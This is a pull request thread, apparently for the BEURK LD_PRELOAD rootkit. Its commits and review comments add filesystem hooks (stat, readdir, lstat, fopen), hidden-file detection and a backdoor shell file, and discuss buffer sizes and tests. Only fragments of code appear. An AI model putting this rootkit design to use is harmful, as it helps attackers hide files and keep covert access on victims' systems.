Add some hooks, file detection and huge reformat

mzap opened the pull request.

Commit:
feat(core): add stat hook

Commit:
feat(core): add readdir hook

Commit:
feat(core): add lstat hook

Commit:
feat(core): add hidden file detection

still need fopen hook to work

Commit:
refactor(builder): add new core features to build

Commit:
feat(core): add fopen hook

Commit:
fix(core): add prototype and FILE definition

can't build without that

Commit:
style(core): add comments, huge reformat

nil0x42 commented:
please consider implementing unit tests on `/tests/core/hooks` as requested by developer's guide,
for all of the newly imlemented hooks

nil0x42 commented on beurk.conf:
```diff
@@ -62,3 +62,12 @@ _ENV_XTERM =        TERM=xterm
+ENV_LINE = %s/environ
+
+# int: maximal length of our strings
+MAX_LEN = 4125
```
why that size specifically ?

nil0x42 replied:
why that size specifically ?

azazel uses this value, but before using it as a generic macro on the whole program, i d like to know exactly why this specific value.
i needed it too on drop_shell_backdoor.c, so for the moment i use a local `SLOOP_BUF_SIZE` on line 94 of the file.

we need to discuss about it

nil0x42 commented on src/hooks/fopen.c:
```diff
@@ -0,0 +1,40 @@
+#include "config.h" /* REAL_FOPEN() */
+#include "hooks.h" /* prototype, FILE */
+
+// TODO: is_procnet()
```
please add a card on trello, or some relevant way to remember to add is_procnet().
another way to remember to do it is to request the api function ven if it still does not exists.

nil0x42 commented on src/is_hidden_file.c:
```diff
@@ -0,0 +1,58 @@
+#include "beurk.h" /* DEBUG(),  prototype */
+#include "config.h" /* FILE, MAX_LEN, MAGIC_STRING, LIBRARY_NAME, ... */
+
+int         is_hidden_file(const char *path) {
```
can you please leave a descriptive coment of what this internal API function actually does ?

ghost commented:
Tests will be done today. I'll add some comments about the internal API too. As for the length, it's a value big enough to ensure reading of all characters in one go, at least here. But I should rework that parsing one day, there's a (very) small chance of failing to detect a hidden file with it right now.

nil0x42 commented:
my question about the size was `why 4125 and not 4126 or 4124, is there  reflexion or valid reason for not using 4096 ?`.
I m very curious about it, so i'd like us to demistify if there is an hidden reason

Commit:
style(core): add some API documentation

is_hidden_file() inner workings are now explained

Commit:
fix(core): define debug header file the right way

config.h contains DEBUG_LEVEL define, used to define our DEBUG macro
and needs to be included

Commit:
chore(cleanup): remove unused file

Commit:
fix(core): sanitize our hidden literals

by declaring an extern in the header file and the global in its own
C file

Commit:
fix(core): remove DEBUG from init process

DEBUG can't be called before defining our REAL_ macros

nil0x42 committed:
test(core): new test: internal_hooks_calls.py

nil0x42 committed:
chore(travis): remove branch whitelisting

all branches are now checked, but only for pull requests
